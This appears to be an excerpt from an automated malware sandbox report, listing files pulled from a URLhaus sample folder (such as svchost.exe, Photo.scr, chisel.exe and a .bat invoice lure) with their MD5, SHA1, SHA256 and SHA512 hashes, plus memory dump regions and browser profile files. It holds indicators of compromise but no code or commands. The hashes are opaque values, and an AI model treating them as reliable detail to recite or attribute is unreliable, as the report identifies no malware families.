C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

MD5 24453759fc86d34383bd0ffc722bbfb5
SHA1 495fa07508f0e79d9ce26f9179285d41303ce402
SHA256 ff4bc7221036ee331d8b913f12aec34493c11b6c2655dc15cf4281a6306126ab
SHA512 aad86f8232a676e1705319f0da2c45a89b533ecf5e8bcbc95d610683247f028b57ae7bf8b791468f6ce9b34962778cec205b48c4612c95c82967bb223ad30db9

C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe

MD5 6c366d318dca314f30309b648776cee9
SHA1 e2cfbf16cf16ecda3297b71d9622b45daf52660a
SHA256 1c5db3ae8ccc55502a6f27661de3d86ff5c48eb1b7ab97448efd6c3eaad1bc36
SHA512 5eb743fad92f2dbfc3ef1a0a84d411e13d72f590fe87cdc0f588a595f95f063720d6d2d3a6b43d2a38a5e0f759a1e296c35dc9a235361f08c0051b96fe78707b

memory/4964-264-0x00000000008C0000-0x00000000008CE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

MD5 d5b00b1895ec026a82818563135981ef
SHA1 60e833ebcf155e4626caf6cdc84d468aea45aa62
SHA256 c6f114c1e8044aae5362b3bf61845f46c7cc6ee23ac9eba89c8dd0977ea806e9
SHA512 3bbcda61b68c80fb0ce2128ad6afa435f7deb06ed44944a94509aab1638ca9528e120c2dbbecc6b378dbf40f37d9d4685f6fedce829dfc99b7a2ba880daa38d3

C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe

MD5 77334f046a50530cdc6e585e59165264
SHA1 657a584eafe86df36e719526d445b570e135d217
SHA256 eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA512 97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

memory/1272-292-0x000002725E6E0000-0x000002725E724000-memory.dmp

memory/4960-304-0x0000000000400000-0x0000000000459000-memory.dmp

memory/4960-303-0x0000000000400000-0x0000000000459000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe

MD5 37d3c4fb51f7ab9c67eec830ae6f9e1b
SHA1 7bff2668e39ebcff90f0230a78e343adf490c00b
SHA256 a45f2013adadd1e3664d28885b014dd8bca38bd5219db05f6083a3665e18ccfc
SHA512 6592785f7a24f3cf46bdb61d5338cc4fb5bb3e584a9366ee1e31dc3080f3fa262bf49a28c65c18dbb7a3efcb37ee0148ae8844b72f00a7b1c8ffa16d148b0726

memory/1272-305-0x000002725EB90000-0x000002725EBA6000-memory.dmp

memory/4020-293-0x000001A8577D0000-0x000001A8577FE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

MD5 d76e1525c8998795867a17ed33573552
SHA1 daf5b2ffebc86b85e54201100be10fa19f19bf04
SHA256 f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
SHA512 c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

MD5 7f79f7e5137990841e8bb53ecf46f714
SHA1 89b2990d4b3c7b1b06394ec116cd59b6585a8c77
SHA256 94f0113ae76742bb2941e823382a89b7f36e6e0de37a63cf39a76c6d1ffbe2da
SHA512 92e1c29c9a375e95cb4307ab9b6b2eaac8b7aea9be9523bdd905baedf8e8ee77bad886076a9b5065fd1ace21e5087358a2fa4d3d2506346139dfb0e580e6df0a

memory/2308-327-0x0000000000400000-0x0000000000422000-memory.dmp

memory/216-328-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe

MD5 a84456172908e096d0ac6272b9503e08
SHA1 8b64d38bae9fc390e621323e9e91eb8f7def421c
SHA256 4f95dff270ac4172d470789c3fce9ae2c656565a3887afc86507ec49981bd128
SHA512 3237f19915957327d3debd46de1c52531622fba5dbb2e06c9685ca336bd4febf19c2f3dd533c5046b0e676d21f10ba10478b3bbe9dbb31823b7dc118a6413800

memory/1872-338-0x0000000000B90000-0x000000000102F000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 c02ba0783524ac6a002584df32d7e17c
SHA1 255cee28715d8b61153c675597d47b129f392f13
SHA256 bd7691f88d4f137f854b08bbb49450e57524b794a41a4101b4d787d1b0f0005d
SHA512 7ed3471daac7069634a2e67b140b05a1a335b02c792533b80e9baf7ec948dd5f943b337ca7a93c36c8ad09038a5e11cffabea64f41c54a00dd47d90da6b3b5a9

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 aba2d86ed17f587eb6d57e6c75f64f05
SHA1 aeccba64f4dd19033ac2226b4445faac05c88b76
SHA256 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d
SHA512 c3f276820d6b2872c98fa36c7b62f236f9f2650b344a243a30dcda9ca08726f6ce27c5c380b4256a1a7d8d4309e1f2f270f10bad18099a8c9e1835925ea51806

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 f7f61ffb8e1f1e272bdf4d326086e760
SHA1 452117f31370a5585d8615fc42bc31fdbe32a348
SHA256 e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af
SHA512 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f

C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe

MD5 cad69031c8878d1b06315be343d99ccf
SHA1 f050a162fc3bed8152d05212c8d02088c972d4d4
SHA256 86596162c86fdb54936df369e7f5da21967f4e4a37a3798dc6ec390f1d78aee0
SHA512 01fe3d0d27750d1939eec22924504ab06008666f350570e1a8855a17a2bdf2af81d802b2648688a1a986bf9a1d0eb763a6663605a8f5aeb1cf890b501acd2fc1

memory/3832-379-0x00000000032D0000-0x00000000042D0000-memory.dmp

memory/3832-383-0x00000000032D0000-0x00000000042D0000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

MD5 66b03d1aff27d81e62b53fc108806211
SHA1 2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256 59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA512 9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe

MD5 4c64aec6c5d6a5c50d80decb119b3c78
SHA1 bc97a13e661537be68863667480829e12187a1d7
SHA256 75c7692c0f989e63e14c27b4fb7d25f93760068a4ca4e90fa636715432915253
SHA512 9054e3c8306999fe851b563a826ca7a87c4ba78c900cd3b445f436e8406f581e5c3437971a1f1dea3f5132c16a1b36c2dd09f2c97800d28e7157bd7dc3ac3e76

memory/1932-418-0x0000000004E10000-0x0000000004EA2000-memory.dmp

memory/1932-426-0x0000000004F50000-0x0000000004FEC000-memory.dmp

memory/1932-425-0x0000000004DE0000-0x0000000004DEA000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd

MD5 f218f177ccd0aabdc3406f3f27f3fe50
SHA1 8c69b44d38d8bb8b3365037d1aa8d30ef8e224f7
SHA256 b0d2f4b13b6a9846dd047418f4d2a70ab9be53edba89b69c55da2491477bd5eb
SHA512 c4afe730fa3b6da328b5af21d7a3695a08759f53c31e62876dce6acceabb7504d27b1e89a33c18c36f3440dcefa7d107a5a7c04542629060f877216e61723c1a

memory/1932-413-0x0000000005320000-0x00000000058C6000-memory.dmp

memory/1932-412-0x0000000000490000-0x0000000000528000-memory.dmp

memory/4760-434-0x000001F1E8BC0000-0x000001F1E8D0F000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

MD5 2fcfe990de818ff742c6723b8c6e0d33
SHA1 9d42cce564dcfa27b2c99450f54ba36d4b6eecaf
SHA256 cb731802d3cd29da2c01ffbb8c8ed4ef7de9d91c133b69b974583bede6bfd740
SHA512 4f20a27817de94a07071960abe0123277c0607a26de709e2ade201597df71d8c2eec7da353efba94dc6a8369b89db4caeaf9505d02b90dc30c37010a885c3613

memory/1368-458-0x0000000000D80000-0x00000000010A4000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe

MD5 afdcb2b1b8fa9182ced13402ddeeb681
SHA1 ca2f5d48e79b3316364416d5ccd5fc9d051032b9
SHA256 8f95965e8d6680f8fdba38f4cbf7c274e36757b17713256ea3a32d96e99e90dd
SHA512 35de4d2f73a017b78631ef473a6656e9bc66b8938eba45bfee65974dc21a4cac4b4174425bc6f595943b8191c97ab28a259645b4e47bb5d73eb1cda59191a918

memory/2300-473-0x0000000000400000-0x000000000043C000-memory.dmp

memory/1996-482-0x0000000004A60000-0x0000000004A96000-memory.dmp

memory/2884-499-0x00007FF6BF8B0000-0x00007FF6BFAEC000-memory.dmp

memory/2884-506-0x00007FF6BF8B0000-0x00007FF6BFAEC000-memory.dmp

memory/2884-501-0x00007FF6BF8B0000-0x00007FF6BFAEC000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe

MD5 03757138d540ad9e87a345bf3b63aebf
SHA1 83a0b3ce46a7178456763e5356bf4940efa41cd1
SHA256 659ef7c3fd01df95231975c36e8e45444f6329da33a70e58690f2ee75c7a722f
SHA512 0f08c40ff45829c608a42a6d0d12c1b2a726d315c28f0b4330320a7585506474f72eca550a90b042eece41911174859e95d4b5056c77999a1acf14d43e5279ca

memory/1996-516-0x0000000005A20000-0x0000000005A86000-memory.dmp

memory/1996-517-0x0000000005A90000-0x0000000005AF6000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe

MD5 5fa72774e9d750628857a68d84275833
SHA1 7eebff7d14817544cc11829e354c1dfc7f603628
SHA256 a170fa6fefc8b753ef0f88384b906ca2338365d8552012ed7aa1c0c8c7cb5a56
SHA512 9ac2715f35e107effef9f4526e6430271ca141bc5a729993e88dfa50eb20f61b15502c54f64e9596cd9bb449a1bb25c1cc98f1d12d857afdda742cdce3280838

memory/1996-523-0x0000000005B00000-0x0000000005E57000-memory.dmp

memory/1732-522-0x0000000000430000-0x000000000059A000-memory.dmp

memory/1872-538-0x0000000000B90000-0x000000000102F000-memory.dmp

memory/1076-540-0x0000000000EA0000-0x0000000001333000-memory.dmp

memory/1732-550-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-562-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-594-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-601-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-599-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-596-0x00000000062A0000-0x00000000063DE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

MD5 ea257066a195cc1bc1ea398e239006b2
SHA1 fce1cd214c17cf3a56233299bf8808a46b639ae1
SHA256 81e95eaca372c94265746b08aac50120c45e6baae7c521a8a23dd0dfdc3b9410
SHA512 57c01e41e30259632ffbe35a7c07cc8b81524ca26320605750a418e0e75f229d2704ae226106147d727fe6330bc5268f7a2a9838fa2e7b0178eadf056682a12f

memory/5520-843-0x0000000000D30000-0x0000000001054000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ewm.exe

MD5 5be32defc6aeca7d5d91d1eb90c14124
SHA1 fec93250d812dadac37d1e587a912f08db92f0e3
SHA256 f2e2a44d8084a1b9b359cb6d32ec93331cde72c53229edb5452590e1c26f562c
SHA512 679583b6bad12b43ce345d777c2a35e40c0a237444b6d29880fc178e38259c2122c693a90aa807f227eca9443e965f325ee57b0884169d3038547f2af3d51731

C:\Users\Admin\Downloads\UrlHausFiles\stail.exe

MD5 a067301261f74d9c74d4622d500d5844
SHA1 0696051bf767c305abf69732a9ec93152441b4bb
SHA256 3d0617574ea3bffac4b64dcadf92d3f7277db7de492efaf8df3dec1f6c99b5aa
SHA512 3852570dd1a4368d233726a5ddae7a5ccc25f6b277a9f47e3bbeb4716be2679bf8503368e0fa6da97f09f72bd20637177112f84dcab0b99552b5ab47be15ea1a

C:\Users\Admin\AppData\Local\Temp\is-R89MV.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1996-895-0x0000000005FB0000-0x0000000005FCE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe

MD5 fe517ecfbb94a742e2b88d67785b87bc
SHA1 4d9385b34c2e6021c63b4bed7fbae4bfee12d4d1
SHA256 7617291aba0aa4d54d49f30a344a16513c45ac7f1af79aacf82b3999d876215c
SHA512 b8aae027f92c3708e8ddf815887f7f70d771d340324edfa52551df6f4f2815b8848d00a40de471b0a729c63f0235f74b811e555054518d3ea069b3efc8be2b6a

memory/5396-939-0x0000000000400000-0x00000000006E8000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe

MD5 a474faa2f1046fbab4c3ad1e3a26097e
SHA1 aa526b2583dd9b72dd4ae2549189c6631f8486c2
SHA256 391233a33e1e163875616a8c1564ec8597b630ffcbb4b123c5cfb5b5d3eeea8b
SHA512 947f248d1e7c7c897a9b508607611bb69fa3a9ac1d8b5a0e0343e955a7d6dd235408d086bdf2ec4e9f15e30c1f082b9980144f6de7eebf95e71719c5e1e7040b

memory/1996-960-0x0000000007140000-0x0000000007184000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

MD5 2d79aec368236c7741a6904e9adff58f
SHA1 c0b6133df7148de54f876473ba1c64cb630108c1
SHA256 b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35
SHA512 022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538

memory/6124-989-0x0000000000400000-0x000000000066D000-memory.dmp

memory/1996-991-0x00000000073A0000-0x00000000073BA000-memory.dmp

memory/1996-990-0x0000000007A00000-0x000000000807A000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

MD5 390ddaff20160396e7490b239b4cad9b
SHA1 44c10c691fc2639b3436abe8dc25542ff5a73067
SHA256 357230056c30b4d7a7d697114d3d90ddc9a13dcb174a9a6d1f74c950e5bcd570
SHA512 fd9d519d5e0f3c7d5ac55d594ef23eff6b96e45efe582b8f2fb88c657d76dd4966de73faf4dcea02913940a46c2aa9a6cec8748bcdfb43530e0b3228f8eb833b

C:\Users\Admin\Downloads\UrlHausFiles\sound.exe

MD5 770bc9a9a9ff4284b8cb6e333478d25c
SHA1 8f634709fea90f7b10a2612d250936f7459c7327
SHA256 6a915f0e2eaa35eb47d70a933a4d8822d65e64ebea485d9dcb5657f1f4bd1cf8
SHA512 30b7acd6de05973291d086b52d302f68031125c3164ca3cc102ae1d1d06ce9f798ceed6db693a73c1ba6ee721284b07ddc27e4c5cbf14e6f3933fdb18da397c3

memory/1872-1079-0x0000000000B90000-0x000000000102F000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe

MD5 6c1bcf0b1297689c8c4c12cc70996a75
SHA1 9d99a2446aa54f00af0b049f54afa52617a6a473
SHA256 40dc213fe4551740e12cac575a9880753a9dacd510533f31bd7f635e743a7605
SHA512 7edf53adf8db463658aa4a966cf9e22bf28583cb0ca4317af19e90d85232b6cb627e810033155383948d36ad6a1a14f32b3381d10c7cd6c4bd0482c974c129db

memory/5512-1091-0x0000000000400000-0x000000000044B000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat

MD5 f4a43c4e63d1bc8908819fc2b3b6a83b
SHA1 03f88667ac44a41a2b5e4b2cf48f23302ae79b6c
SHA256 ecc61fe635e2cdb0859441ef90e330230094e7514cf00cb48829e136d713b63b
SHA512 6f1ce342403bc33f5dabfa0260da8f45bfd6d3bdfe72df20e0a617f71bf2abe926a29393d4a9e4621ee8a5ade029c20ed025fe377ab7c1d6f954f866c1efe76f

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

memory/5420-1103-0x0000000000070000-0x000000000019E000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 81ca7231a8251adb6b528e40a8a64fa5
SHA1 553d6fe0edb1ff09d420f50b1c7e46ae5f1034b4
SHA256 367fb8941fab2914ef0c3e24835891e32017403457d1153d1f037572aa243ed9
SHA512 d06aad737b3f034b13349b88cfc4117dc07a16b36800dce61fbd921453c7df12bacefab3ab7f87b0688381fd8b0441955f4540b979fea421ac2a817ed982e7b0

C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe

MD5 6d81053e065e9bb93907f71e7758f4d4
SHA1 a1d802bb6104f2a3109a3823b94efcfd417623ec
SHA256 ac8e5e2c1d93079850024ac0ca311b68576b700817ef26509692ca1e10e6d52b
SHA512 8a1c59a03e6cbcedadc0d40e0dc58fc7ea03d3f0f70353b2fd1ea07e3a67526f3c01cb58364f55b0f7f56602c1f967d9fe33cbd3cf7326e7d5801d2e910c4183

memory/1996-1130-0x0000000007840000-0x0000000007900000-memory.dmp

memory/1996-1127-0x0000000002610000-0x000000000261A000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 680ac3eb351fa5695226c02d374440f4
SHA1 199b9e1c310270c9b376dbb95a4c4165ce0ecd88
SHA256 4c12ce3f75bb90fba67dd1d3de6c2f6667252810aff265acca97b2ea3c9ef22d
SHA512 9776ad3884abe406c85a6e5bb80e39bf5200ab483af72c2b7b586ed80eb441a73edc3bda8f071c795a3e8526a2c9f8166e509cb0d7b0caf12f48d14f8ec78bf8

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

MD5 b55753879acdcbdf648b80008c98b7ca
SHA1 2ec1e68cdfc6fadd0cabab8ff6dc4d5465130fcf
SHA256 6dadafe652783700b32b200659d6da58ce63b8547b56b9272f5799d6bd70ec79
SHA512 39a1fac2f0c887ad808b04d7db37da2d0ed3645c8cc52d32ea8ab65025128359f5a99e01dea8d7a8c74554a4e78c11af82e8fbd8b59b47852573e0281a2cf64e

memory/5880-1177-0x0000000000A30000-0x00000000016F8000-memory.dmp

memory/5612-1190-0x0000000007BA0000-0x0000000007C43000-memory.dmp

memory/5612-1189-0x0000000006F60000-0x0000000006F7E000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe

MD5 7eae075c51e9bda629835d4b2815ee03
SHA1 e00866d71d860f3f3c76d5ed4f797c92c7cedc9b
SHA256 f82edf0228b8e58517659bc465599a85609377f34c9e4a8b1279e10806109b61
SHA512 fb3a1caee110ae8773a9651e9bd637541938057861bda9d454aabe8e42c28b0dd0ddf2f528bae2f71d961674345f61277248a026866f5c1f9e46260bd4d3417c

memory/5612-1200-0x0000000007D20000-0x0000000007D2A000-memory.dmp

memory/5612-1202-0x0000000007F20000-0x0000000007FB6000-memory.dmp

memory/5612-1179-0x000000006E7C0000-0x000000006E80C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\chrome_133.exe

MD5 5e3c406c34bdbc2fae5ddc51f97c1c49
SHA1 efbb8ad8a3868b91eaee18831e39b8ad30f7d378
SHA256 fde420dfca90df03a13a070732ee60985502a74edd4aec12572ac779bdb4ff27
SHA512 a0d4a6b3f13c72e50b05c16b476e1a431b2fae5bd0b80e738b3768979c3d7b351e412be2e5fbab5cf634854b004b139ec21e5dfa6b6ae83092d653e0a5aab1d1

C:\Users\Admin\Downloads\UrlHausFiles\PCSupport.exe

MD5 eeabe641c001ce15e10f3ee3717b475a
SHA1 10fdda016fc47390017089367882281c6d38769f
SHA256 bb5ef9f70483ed7c79e37eca9dd136a514a346943edfe2803e27d1f6b262f05a
SHA512 1b0b9a398cf5a5e7c5ab0035796d07db720a8babcaf93fc92d1119ada5785c9de4d5df6a0ed10a29198cb4cd7c57da50ef4dc4c4fba5c77f72bf9fdcb73ac55a

memory/1872-1232-0x00007FF738510000-0x00007FF73948B000-memory.dmp

memory/5612-1178-0x0000000007B60000-0x0000000007B92000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe

MD5 5a3824bbaa2c5e7167474c89ff844e36
SHA1 4151cc095609475fdec00f9f5d98b10f72459f3d
SHA256 29bbfb087672d4fc8a2dc62f354646e6e784429b0b0e66feb59a46285c07b9da
SHA512 3dd23cf565385b17203f5d229026e10580560b3ca3b7b9e4cf09ca10c12ab91ba66f3d4b5a6ac4417f28bc1dfa2c26ab3a388deb1281a33805bb858f57b7a4c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e87625b4a77de67df5a963bf1f1b9f24
SHA1 727c79941debbd77b12d0a016164bae1dd3f127c
SHA256 07ecc7bd328990f44b189112a1a738861b0f4528097d4371e1ab0c46d8819f4e
SHA512 000d74220ba78628b727441c1b3f8813eec7fc97ff9aa6963eb2ab08d09525fa03935b32e86458c42e573b828a22b0b229af02b47eee511dc83de4ed3b5e726b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5a3a3713765c1cdd345e0df40d17c500
SHA1 b5994f487575dbdcdf999fd093136be7572c35f1
SHA256 624bb8f0da87744812be68440cc66fbf24d036cf0b3a87e05b4a24421b5c8a96
SHA512 8d9ccd2b4044f8d25cc52375138e71e1112f897fbdad2b178ca34f182b472a226009447bbe52165d05a38fcb9a57b2459cb8c1399744a8be93fafb024e4a5897

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

memory/1932-1277-0x0000000004F40000-0x0000000004F52000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5d9c9a841c4d3c390d06a3cc8d508ae6
SHA1 052145bf6c75ab8d907fc83b33ef0af2173a313f
SHA256 915ea0e3e872d2b2e7d0e0ca30f282675139c787fec8043a6e92b9ef68b4f67d
SHA512 8243684857e1c359872b8e795a0e5f2ee56b0c0c1e1c7e5d264c2c28476e9830981bb95244f44c3b2ed334c3e1228f3d6245cce2f3d1f34cdbce8e2af55b4c85

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4f4e79db2e68118d281c4fb4496b1194
SHA1 89879b534019ef1673b176e543cc7e8c13a6d931
SHA256 42dfbaeeefdad4b23da00b2a674f0a3d54d4671b1ad684b074e320740503f690
SHA512 a351a0affc041c96c40c31f71ff3beaaa50aeee77687655dc2fac5fc2bc36b08748569fed2839ebeea292ce7f43d05b61be01f3c2df0ef312968f1837dd10bca

memory/1888-986-0x000000001CAF0000-0x000000001CBA2000-memory.dmp

memory/1888-985-0x000000001C9E0000-0x000000001CA30000-memory.dmp

memory/1996-975-0x0000000007300000-0x0000000007376000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Downloads\UrlHausFiles\mi.exe

MD5 f6d520ae125f03056c4646c508218d16
SHA1 f65e63d14dd57eadb262deaa2b1a8a965a2a962c
SHA256 d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1
SHA512 d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d

memory/1996-896-0x00000000061D0000-0x000000000621C000-memory.dmp

memory/1732-592-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-590-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-589-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-586-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-584-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-582-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-580-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-578-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-576-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-574-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-572-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-564-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-560-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-558-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-556-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-554-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-552-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-548-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-546-0x00000000062A0000-0x00000000063DE000-memory.dmp

memory/1732-545-0x00000000062A0000-0x00000000063DE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

MD5 6f154cc5f643cc4228adf17d1ff32d42
SHA1 10efef62da024189beb4cd451d3429439729675b
SHA256 bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff
SHA512 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

memory/1732-539-0x00000000062A0000-0x00000000063E4000-memory.dmp

memory/1996-515-0x0000000005170000-0x0000000005192000-memory.dmp

memory/2308-494-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1996-491-0x00000000051E0000-0x00000000058AA000-memory.dmp

memory/1076-2080-0x0000000000EA0000-0x0000000001333000-memory.dmp

memory/1732-2295-0x0000000006420000-0x000000000646C000-memory.dmp

memory/1732-2294-0x0000000006610000-0x00000000066C6000-memory.dmp

memory/5396-2305-0x0000000000400000-0x00000000006E8000-memory.dmp

memory/1732-2306-0x00000000067D0000-0x0000000006824000-memory.dmp

memory/1732-2307-0x0000000006820000-0x000000000688E000-memory.dmp

memory/1732-2308-0x0000000006AC0000-0x0000000006B58000-memory.dmp

memory/5512-3992-0x0000000000400000-0x000000000044B000-memory.dmp

memory/5420-4394-0x0000000000070000-0x000000000019E000-memory.dmp

memory/5880-4420-0x0000000000A30000-0x00000000016F8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 137094a3453899bc0bc86df52edd9186
SHA1 66bc2c2b45b63826bb233156bab8ce31c593ba99
SHA256 72d823cac2d49660cdd20ebf4d3ac222c4dd15aae6e5ac4a64f993ef5c4fdd44
